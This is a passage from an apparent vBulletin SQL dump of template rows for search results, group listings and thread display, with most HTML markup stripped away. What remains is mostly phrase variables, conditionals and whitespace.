    \r\n\r\n $vbphrase[search]:\r\n \r\n \r\n $vbphrase[key_words]: $displayWords\r\n\r\n \r\n ; \r\n $vbphrase[threads_started_by]$vbphrase[posts_made_by]: $displayUsers\r\n \r\n\r\n \r\n ; \r\n $vbphrase[tag]: $display_tag\r\n \r\n\r\n \r\n ; \r\n $vbphrase[prefix]: $display_prefixes $vbphrase[or_no_prefix]\r\n \r\n \r\n $vbphrase[new_posts_nav]\r\n \r\n $vbphrase[posts_from_last_day]\r\n \r\n\r\n \r\n ; $vbphrase[forum]: $displayForums $vbphrase[and_child_forums]\r\n \r\n \r\n
    $vbphrase[thread_titles_only_search]\r\n
    \r\n
    \r\n
    $vbphrase[words_very_common]: $displayCommon
    \r\n\r\n$searchbits\r\n\r\n\r\n\r\n\r\n$announcebits\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n$searchbits\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n
      $vbphrase[thread] / $vbphrase[thread_starter]$vbphrase[last_post]$vbphrase[replies]$vbphrase[views]$vbphrase[forum] \r\n \r\n
    \r\n
    \r\n $vbphrase[no_unread_threads]\r\n
    \r\n
    \r\n \r\n $vbphrase[showing_results_x_to_y_of_z]\r\n \r\n  \r\n \r\n
    \r\n\r\n\r\n\r\n\r\n \r\n\r\n
    $pagenav
    \r\n
    \r\n\r\n\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n
    \r\n
    \r\n $vbphrase[moderation]
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n$template_hook[search_results_bottom]\r\n\r\n\r\n\r\n \r\n \r\n\r\n
     $forumjump
    \r\n\r\n\r\n
    \r\n $threadadmin_imod_menu\r\n
    \r\n
    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1223077314, 'vBulletin Solutions', '3.8.0 Alpha 2', 'vbulletin'), (1550, -1, 'search_results_postbit', '\r\n\r\n \r\n\r\n\r\n \".(($show[\'moderated\']) ? (\"\r\n \r\n\r\n
    \r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n $vbphrase[forum]: session->vars[\'sessionurl\'] . \"f=$post[forumid]\\\">$post[forumtitle]\r\n \r\n \\\"\\\"\r\n $post[postdate]\".((!$show[\'detailedtime\']) ? (\", $post[posttime]\") : (\"\")).\"\r\n
    \r\n \") : (\"\r\n \r\n \")).\"\r\n
    \r\n $vbphrase[replies]: $post[replycount]\r\n
    \r\n \r\n
    \r\n $vbphrase[views]: $post[views]\r\n
    \r\n
    \r\n $vbphrase[posted_by]\r\n \".(($post[userid]) ? (\"session->vars[\'sessionurl\'] . \"u=$post[userid]\\\">$post[username]\") : (\"$post[username]\")).\"\r\n
    \r\n\r\n
    \r\n
    \r\n \".(($post[posticon]) ? (\"\\\"$post[posticontitle]\\\"\") : (\"\")).\"\r\n session->vars[\'sessionurl\'] . \"p=$post[postid]$post[highlight]#post$post[postid]\\\">$post[posttitle]
    \r\n
    \r\n $post[pagetext]\r\n
    \r\n
    \r\n\r\n \".(($show[\'moderated\']) ? (\"\r\n
    \\\"$vbphrase[moderated_post]\\\"
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'deleted\']) ? (\"\r\n
    \\\"$vbphrase[deleted_post]\\\"
    \r\n
    \r\n \" . construct_phrase(\"$post[del_phrase]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$post[del_userid]\", \"$post[del_username]\") . \"\r\n \".(($post[\'del_reason\']) ? (\"$vbphrase[reason]: $post[del_reason]\") : (\"\")).\"\r\n
    \r\n \") : (\"\")).\"\r\n
    ', '\r\n\r\n \r\n\r\n\r\n \r\n \r\n\r\n
    \r\n \r\n disabled=\"disabled\" />\r\n \r\n \r\n $vbphrase[forum]: $post[forumtitle]\r\n \r\n \"\"\r\n $post[postdate], $post[posttime]\r\n
    \r\n \r\n \r\n \r\n
    \r\n $vbphrase[replies]: $post[replycount]\r\n
    \r\n
    \r\n \"\"\r\n $post[typeprefix] $post[prefix_rich] $post[threadtitle]\r\n
    \r\n
    \r\n $vbphrase[views]: $post[views]\r\n
    \r\n
    \r\n $vbphrase[posted_by]\r\n $post[username]$post[username]\r\n
    \r\n\r\n
    \r\n
    \r\n \"$post[posticontitle]\"\r\n $post[posttitle]
    \r\n
    \r\n $post[pagetext]\r\n
    \r\n
    \r\n\r\n \r\n
    \"$vbphrase[moderated_post]\"
    \r\n
    \r\n\r\n \r\n
    \"$vbphrase[deleted_post]\"
    \r\n
    \r\n $post[del_phrase]\r\n $vbphrase[reason]: $post[del_reason]\r\n
    \r\n
    \r\n
    ', 'template', 1233751411, 'vBulletin Solutions', '3.8.2', 'vbulletin'), (1551, -1, 'search_results_postbit_lastvisit', '\r\n\r\n \r\n\r\n
    $vbphrase[all_posts_below_here]
    ', '\r\n\r\n \r\n\r\n
    $vbphrase[all_posts_below_here]
    ', 'template', 1149792002, 'vBulletin Solutions', '3.6.0 Beta 2', 'vbulletin'), (1552, -1, 'SHOWGROUPS', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[show_groups]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($moderatorbits) ? (\"\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n \".(($show[\'contactinfo\']) ? (\"\") : (\"\")).\"\r\n\r\n$moderatorbits\r\n
    $vbphrase[moderators]
     $vbphrase[username]\".(($show[\'locationfield\']) ? (\" / $vbphrase[location_perm]\") : (\"\")).\"$vbphrase[forums]$vbphrase[contact]
    \r\n
    \r\n\r\n\") : (\"\")).\"\r\n\r\n$usergroups\r\n\r\n\r\n\r\n \r\n \r\n\r\n
     $forumjump
    \r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[show_groups]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n$moderatorbits\r\n
    $vbphrase[moderators]
     $vbphrase[username] / $vbphrase[location_perm]$vbphrase[forums]$vbphrase[contact]
    \r\n
    \r\n\r\n
    \r\n\r\n$usergroups\r\n\r\n\r\n\r\n \r\n \r\n\r\n
     $forumjump
    \r\n\r\n$footer\r\n\r\n', 'template', 1231162002, 'vBulletin Solutions', '3.8.0 Release Candidate 3', 'vbulletin'), (1553, -1, 'showgroups_forumbit', 'session->vars[\'sessionurl\'] . \"f=$forumid\\\">$forumtitle', '$forumtitle', 'template', 1069772461, 'vBulletin Solutions', '', 'vbulletin'), (1554, -1, 'showgroups_usergroup', '\r\n\r\n \r\n\r\n\r\n \r\n \r\n \".(($show[\'contactinfo\']) ? (\"\") : (\"\")).\"\r\n\r\n$usergroupbits\r\n
    $user[title]
     $vbphrase[user_name]\".(($show[\'locationfield\']) ? (\" / $vbphrase[location_perm]\") : (\"\")).\"$vbphrase[contact]
    \r\n
    \r\n', '\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n$usergroupbits\r\n
    $user[title]
     $vbphrase[user_name] / $vbphrase[location_perm]$vbphrase[contact]
    \r\n
    \r\n', 'template', 1231161696, 'vBulletin Solutions', '3.8.0 Release Candidate 3', 'vbulletin'), (1555, -1, 'showgroups_usergroupbit', '\r\n $user[onlinestatus]\r\n \r\n session->vars[\'sessionurl\'] . \"u=$user[userid]\\\">$user[musername]\r\n \".(($show[\'locationfield\'] AND $user[\'field2\']) ? (\"
    $user[field2]
    \") : (\"\")).\"\r\n \r\n \".(($showforums) ? (\"\r\n
    $user[forumbits]
    \r\n \") : (\"\")).\"\r\n \".(($show[\'contactinfo\']) ? (\"\r\n \r\n \".(($show[\'pmlink\']) ? (\"session->vars[\'sessionurl\'] . \"do=newpm&u=$user[userid]\\\" rel=\\\"nofollow\\\">\\\"\"\") : (\"\")).\"\r\n \".(($show[\'emaillink\']) ? (\"session->vars[\'sessionurl\'] . \"do=mailmember&u=$user[userid]\\\" rel=\\\"nofollow\\\">\\\"\"\") : (\"\")).\"\r\n \r\n \") : (\"\")).\"\r\n', '\r\n $user[onlinestatus]\r\n \r\n $user[musername]\r\n
    $user[field2]
    \r\n \r\n \r\n
    $user[forumbits]
    \r\n
    \r\n \r\n \r\n \"<phrase$vbphrase[send_private_message_to_x]\" border=\"0\" />\r\n \"<phrase$vbphrase[send_message_via_email_to_x]\" border=\"0\" />\r\n \r\n \r\n', 'template', 1231161424, 'vBulletin Solutions', '3.8.0 Release Candidate 3', 'vbulletin'), (1556, -1, 'SHOWTHREAD', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $thread[prefix_plain_html] $thread[title]\".(($pagenumber>1) ? (\" - \" . construct_phrase(\"$vbphrase[page_x]\", \"$pagenumber\") . \"\") : (\"\")).\" - \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\r\n \r\n \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$poll\r\n\r\n\".(($show[\'inlinemod\']) ? (\"\r\n$spacer_close\r\n
    \r\n$spacer_open\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n \".(($show[\'largereplybutton\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n \".(($show[\'pagenav\']) ? (\"\") : (\"\")).\"\r\n\r\n
    session->vars[\'sessionurl\'] . \"do=newreply&noquote=1&p=$FIRSTPOSTID\\\" rel=\\\"nofollow\\\">\".(($show[\'closethread\']) ? (\"\\\"$vbphrase[reply]\\\"\") : (\"\\\"$vbphrase[closed_thread]\\\"\")).\" $pagenav
    \r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \".(($show[\'search\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'threadrating\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($GLOBALS[\'vbulletin\']->options[\'allowthreadedmode\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'inlinemod\']) ? (\"\r\n \".(($show[\'popups\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n \") : (\"\")).\"\r\n\r\n\r\n
    \r\n
    \r\n \".(($show[\'firstunreadlink\']) ? (\"\r\n \\\"$vbphrase[view_first_unread]\\\"\r\n $vbphrase[view_first_unread]\r\n \") : (\"\")).\"\r\n  \r\n
    \r\n
    \r\n $vbphrase[thread_tools]\r\n \".(($show[\'popups\']) ? (\"\") : (\"\")).\"\r\n \r\n $vbphrase[search_this_thread]\r\n \".(($show[\'popups\']) ? (\"\") : (\"\")).\"\r\n \r\n \".(($show[\'rating\']) ? (\"$vbphrase[rating]: \\\"\"\") : (\"$vbphrase[rate_thread]\")).\"\r\n \".(($show[\'popups\']) ? (\"\") : (\"\")).\"\r\n \r\n $vbphrase[display_modes]\r\n \".(($show[\'popups\']) ? (\"\") : (\"\")).\"\r\n \r\n \r\n
    \r\n\r\n\r\n\".(($show[\'inlinemod\'] AND $show[\'popups\']) ? (\"\r\n
    \r\n $threadadmin_imod_menu_post\r\n
    \r\n\") : (\"\")).\"\r\n\r\n\r\n$spacer_close\r\n\r\n\r\n\".(($show[\'threadedmode\'] OR $show[\'hybridmode\']) ? (\"\r\n\r\n$threadlist\r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'reputation\']) ? (\"\r\n\r\n\") : (\"\")).\"\r\n\r\n
    $postbits
    \r\n\r\n\r\n$spacer_open\r\n\r\n\r\n\r\n\r\n\r\n \".(($show[\'largereplybutton\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n \".(($show[\'pagenav\'] OR $show[\'inlinemod\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\r\n
    session->vars[\'sessionurl\'] . \"do=newreply&noquote=1&p=$LASTPOSTID\\\" rel=\\\"nofollow\\\">\".(($show[\'closethread\']) ? (\"\\\"$vbphrase[reply]\\\"\") : (\"\\\"$vbphrase[closed_thread]\\\"\")).\" $pagenav\r\n \".(($show[\'inlinemod\']) ? (\"\r\n
    \r\n \".(($show[\'pagenav\']) ? (\"
    \") : (\"\")).\"$vbphrase[moderation]
    \r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \") : (\"\")).\"\r\n
    \r\n\r\n\r\n\".(($show[\'inlinemod\']) ? (\"\r\n$spacer_close\r\n
    \r\n$spacer_open\r\n\") : (\"\")).\"\r\n\r\n\".(($bookmarksites) ? (\"\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[bookmarks]
      $bookmarksites
    \r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'tag_box\']) ? (\"\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \".(($show[\'manage_tag\']) ? (\"\") : (\"\")).\"\r\n \r\n session->vars[\'sessionurl_q\'] . \"\\\">$vbphrase[tags]\r\n
    $tag_list
    \r\n\r\n \r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n$ad_location[ad_showthread_beforeqr]\r\n\r\n\".(($show[\'lightbox\']) ? (\"\r\n\r\n \r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'multiquote_global\']) ? (\"\r\n\r\n \r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'quickreply\'] OR $show[\'ajax_js\']) ? (\"\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n $vbphrase[vbulletin_message]\r\n
     
    $vbphrase[cancel_changes]
    \r\n\r\n\r\n\r\n $vBeditTemplate[clientscript]\r\n \".(($show[\'quickedit\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n\") : (\"\")).\"\r\n\r\n\r\n\".(($show[\'quickreply\']) ? (\"\r\n\r\n
    \r\n \r\n
    options[\'postminchars\'] . \");\\\" id=\\\"qrform\\\">\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \".(($show[\'quickreply_collapse\']) ? (\"\\\"\\\"\") : (\"\")).\"\r\n $vbphrase[quick_reply]\r\n
    $vbphrase[errors_occured_when_submitted]
    $vbphrase[okay]
    \r\n
    \r\n
    \r\n
    $vbphrase[message]:
    \r\n
    $messagearea
    \r\n\r\n
    \r\n $vbphrase[options]\r\n
    \r\n \".(($GLOBALS[\'vbulletin\']->userinfo[\'signature\']) ? (\"\r\n
    \r\n \") : (\"\")).\"\r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n \r\n userinfo[\'userid\'] . \"\\\" />\r\n \r\n \r\n
    \r\n\r\n
    \r\n \\\"$vbphrase[posting_quick_reply_please_wait]\\\" $vbphrase[posting_quick_reply_please_wait]\r\n
    \r\n
    \r\n
    \r\n\r\n \".((!is_browser(\'ie\') AND $show[\'wysiwyg\']) ? (\"\r\n \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'next_prev_links\']) ? (\"\r\n\r\n
    \r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'activeusers\']) ? (\"\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \" . construct_phrase(\"$vbphrase[users_viewing_this_thread_x_y_z]\", \"$totalonline\", \"$numberregistered\", \"$numberguest\") . \"\r\n
    \r\n $activeusers\r\n
    \r\n\r\n\") : (\"\")).\"\r\n\r\n$template_hook[showthread_after_activeusers]\r\n\r\n\".(($show[\'popups\']) ? (\"\r\n\r\n
    \r\n\r\n\r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \".(($show[\'sendtofriend\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'member\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'addpoll\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'adminoptions\']) ? (\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n
    $vbphrase[thread_tools]
    \\\"$vbphrase[show_printable_version]\\\" session->vars[\'sessionurl\'] . \"t=$threadid\\\" accesskey=\\\"3\\\" rel=\\\"nofollow\\\">$vbphrase[show_printable_version]
    \\\"$vbphrase[email_this_page]\\\" session->vars[\'sessionurl\'] . \"do=sendtofriend&t=$threadid\\\" rel=\\\"nofollow\\\">$vbphrase[email_this_page]
    \\\"$vbphrase[subscription]\\\"\r\n \".(($show[\'subscribed\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=removesubscription&t=$threadid\\\" rel=\\\"nofollow\\\">$vbphrase[unsubscribe_from_this_thread]\r\n \") : (\"\r\n session->vars[\'sessionurl\'] . \"do=addsubscription&t=$threadid\\\" rel=\\\"nofollow\\\">$vbphrase[subscribe_to_this_thread]\r\n \")).\"\r\n
    \\\"$vbphrase[add_a_poll]\\\" session->vars[\'sessionurl\'] . \"do=newpoll&t=$threadinfo[threadid]\\\">$vbphrase[add_a_poll_to_this_thread]
    $vbphrase[admin_tools]
    \r\n \".(($show[\'openclose\']) ? (\"
    \") : (\"\")).\"\r\n \".(($show[\'moderatethread\']) ? (\"
    \") : (\"\")).\"\r\n \".(($show[\'movethread\']) ? (\"
    \r\n
    \") : (\"\")).\"\r\n \".(($show[\'editthread\']) ? (\"
    \") : (\"\")).\"\r\n \".(($show[\'deletethread\']) ? (\"
    \") : (\"\")).\"\r\n \".(($show[\'managethread\']) ? (\"\r\n
    \r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n\".(($GLOBALS[\'vbulletin\']->options[\'allowthreadedmode\']) ? (\"\r\n\r\n\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \".(($show[\'linearmode\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n \r\n \r\n \".(($show[\'hybridmode\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n \r\n \r\n \".(($show[\'threadedmode\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n \r\n
    $vbphrase[display_modes]
    \\\"$vbphrase[linear_mode]\\\" $vbphrase[linear_mode]\\\"$vbphrase[linear_mode]\\\" session->vars[\'sessionurl\'] . \"p=$FIRSTPOSTID&mode=linear$highlightwords#post$FIRSTPOSTID\\\">$vbphrase[switch_to_linear_mode]
    \\\"$vbphrase[hybrid_mode]\\\" $vbphrase[hybrid_mode]\\\"$vbphrase[hybrid_mode]\\\" session->vars[\'sessionurl\'] . \"mode=hybrid&t=$thread[threadid]$highlightwords\\\">$vbphrase[switch_to_hybrid_mode]
    \\\"$vbphrase[threaded_mode]\\\" $vbphrase[threaded_mode]\\\"$vbphrase[threaded_mode]\\\" session->vars[\'sessionurl\'] . \"p=$FIRSTPOSTID&mode=threaded$highlightwords#post$FIRSTPOSTID\\\">$vbphrase[switch_to_threaded_mode]
    \r\n
    \r\n\r\n\") : (\"\")).\"\r\n\r\n\r\n\".(($show[\'search\']) ? (\"\r\n\r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[search_this_thread]
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n $gobutton
    \r\n
    session->vars[\'sessionurl\'] . \"searchthreadid=$threadid\\\">$vbphrase[advanced_search]
    \r\n
    \r\n
    \r\n\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n\".(($show[\'threadrating\']) ? (\"\r\n \r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n \".(($show[\'ratethread\']) ? (\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \") : (\"\r\n \r\n \r\n \r\n \")).\"\r\n
    $vbphrase[rate_this_thread]
    \r\n\r\n
    \\\"$vbphrase[excellent]\\\"
    \r\n
    \\\"$vbphrase[good]\\\"
    \r\n
    \\\"$vbphrase[average]\\\"
    \r\n
    \\\"$vbphrase[bad]\\\"
    \r\n
    \\\"$vbphrase[terrible]\\\"
    \r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n
    $vbphrase[already_rated_this_thread]
    \r\n
    \r\n
    \r\n \r\n\r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n\r\n\") : (\"\r\n\r\n\r\n\r\n\r\n\r\n \r\n \".(($show[\'search\']) ? (\"\") : (\"\")).\"\r\n\r\n\r\n \r\n \".(($show[\'search\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\r\n\".(($GLOBALS[\'vbulletin\']->options[\'allowthreadedmode\'] OR $show[\'threadrating\']) ? (\"\r\n\r\n \".(($GLOBALS[\'vbulletin\']->options[\'allowthreadedmode\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'threadrating\']) ? (\"\") : (\"\")).\"\r\n\r\n\r\n \".(($GLOBALS[\'vbulletin\']->options[\'allowthreadedmode\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'threadrating\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\r\n\") : (\"\")).\"\r\n
    $vbphrase[thread_tools]$vbphrase[search_this_thread]
    \r\n\r\n \r\n \r\n \r\n\r\n \r\n\r\n \r\n
    \r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n $vbphrase[search_this_thread]:
    \r\n $gobutton
    \r\n session->vars[\'sessionurl\'] . \"searchthreadid=$threadid\\\">$vbphrase[advanced_search]\r\n
    \r\n
    \r\n \r\n\r\n
    $vbphrase[display_modes]$vbphrase[rate_this_thread]
    \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n
    \r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n $vbphrase[rate_this_thread]:
    \r\n $gobutton\r\n
    \r\n
    \r\n \r\n\r\n
    \r\n
    \r\n\r\n\r\n\r\n\")).\"\r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n
    \r\n $forumrules\r\n \r\n \r\n \".((!$show[\'popups\'] AND $show[\'adminoptions\']) ? (\"\r\n \r\n \r\n \r\n
    \r\n \") : (\"\")).\"\r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n $vbphrase[admin_tools]:
    \r\n $gobutton\r\n
    \r\n
    \r\n
    \r\n $forumjump\r\n
    \r\n
    \r\n\r\n\r\n
    \r\n\r\n$similarthreads\r\n\r\n$footer\r\n\r\n\r\n
    \r\n \r\n \".(($show[\'ratethread\']) ? (\"\r\n \r\n \") : (\"\r\n \".(($show[\'threadrating\']) ? (\"\r\n $vbphrase[you_rated_this_thread]: $threadinfo[vote]\r\n \") : (\"\")).\"\r\n \")).\"\r\n \r\n
    \r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $thread[prefix_plain_html] $thread[title]<if condition=\"$pagenumber>1\"> - <phrase 1=\"$pagenumber\">$vbphrase[page_x]</phrase></if> - $vboptions[bbtitle]\r\n \r\n \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$poll\r\n\r\n\r\n$spacer_close\r\n
    \r\n$spacer_open\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n
    \"$vbphrase[reply]\"\"$vbphrase[closed_thread]\" $pagenav
    \r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n
    \r\n
    \r\n \r\n \"$vbphrase[view_first_unread]\"\r\n $vbphrase[view_first_unread]\r\n \r\n  \r\n
    \r\n
    \r\n accesskey=\"3\">$vbphrase[thread_tools]\r\n \r\n \r\n $vbphrase[search_this_thread]\r\n \r\n \r\n $vbphrase[rating]: \"<phrase$vbphrase[thread_rating_x_votes_y_average]\" border=\"0\" />$vbphrase[rate_thread]\r\n \r\n \r\n $vbphrase[display_modes]\r\n \r\n \r\n \r\n
    \r\n\r\n\r\n\r\n
    \r\n $threadadmin_imod_menu_post\r\n
    \r\n
    \r\n\r\n\r\n$spacer_close\r\n\r\n\r\n\r\n\r\n$threadlist\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n
    $postbits
    \r\n\r\n\r\n$spacer_open\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n
    \"$vbphrase[reply]\"\"$vbphrase[closed_thread]\" $pagenav\r\n \r\n
    \r\n
    $vbphrase[moderation]
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n\r\n\r\n$spacer_close\r\n\r\n$spacer_open\r\n
    \r\n\r\n\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[bookmarks]
      $bookmarksites
    \r\n\r\n
    \r\n\r\n\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n $vbphrase[tags]\r\n
    $tag_list
    \r\n\r\n \r\n \r\n\r\n
    \r\n\r\n$ad_location[ad_showthread_beforeqr]\r\n\r\n\r\n\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n $vbphrase[vbulletin_message]\r\n
     
    $vbphrase[cancel_changes]
    \r\n\r\n\r\n\r\n $vBeditTemplate[clientscript]\r\n \r\n \r\n \r\n \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n
    \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \"\"\r\n $vbphrase[quick_reply]\r\n
    $vbphrase[errors_occured_when_submitted]
    $vbphrase[okay]
    \r\n
    \r\n
    \r\n
    $vbphrase[message]:
    \r\n
    $messagearea
    \r\n\r\n
    \r\n $vbphrase[options]\r\n
    \r\n \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n\r\n
    \r\n \"$vbphrase[posting_quick_reply_please_wait]\" $vbphrase[posting_quick_reply_please_wait]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n \r\n
    \r\n
    \r\n\r\n \r\n\r\n
    \r\n\r\n\r\n\r\n
    \r\n
    \r\n «\r\n $vbphrase[prev_thread]\r\n |\r\n $vbphrase[next_thread]\r\n »\r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[users_viewing_this_thread_x_y_z]\r\n
    \r\n $activeusers\r\n
    \r\n\r\n
    \r\n\r\n$template_hook[showthread_after_activeusers]\r\n\r\n\r\n\r\n
    \r\n\r\n\r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[thread_tools]
    \"$vbphrase[show_printable_version]\" $vbphrase[show_printable_version]
    \"$vbphrase[email_this_page]\" $vbphrase[email_this_page]
    \"$vbphrase[subscription]\"\r\n \r\n $vbphrase[unsubscribe_from_this_thread]\r\n \r\n $vbphrase[subscribe_to_this_thread]\r\n \r\n
    \"$vbphrase[add_a_poll]\" $vbphrase[add_a_poll_to_this_thread]
    $vbphrase[admin_tools]
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n\r\n\r\n\r\n\r\n
